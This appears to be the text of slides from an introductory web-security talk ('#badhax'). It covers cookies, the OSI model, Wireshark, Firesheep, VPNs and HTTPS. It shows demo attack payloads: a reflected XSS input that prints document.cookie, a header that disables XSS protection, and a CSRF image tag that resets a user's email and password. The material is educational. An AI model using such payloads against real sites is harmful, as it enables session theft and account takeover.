#badhax
Social Engineering
Cookies
How websites remember you
Seven Layers of Networks
Open Systems Interconnection (OSI) model
Ok, so Wireshark
First person to hack me gets 5cɃ
Second person to hack me gets 5cɃ
Firesheep
(baaaa)
Protect Yourself with
a VPN
Building a site?
Use HTTPS everywhere
XSS
Cross-Site Scripting
<input type="search" name="q" value="harper">
<input type="search" name="q" value="
"><script>
alert(document.cookie)
</script><input type="hidden
">
X-Xss-Protection: 0
Making it last
XSRF/CSRF
Cross-Site Request Forgery
<form action="/users/dumb_update" method="get">
<img src="http://catmeanings.herokuapp.com/users/dumb_update?user[email]=lol%40lol.lol&user[password]=p0wned&user[password_confirmation]=p0wned" />
SQL Injection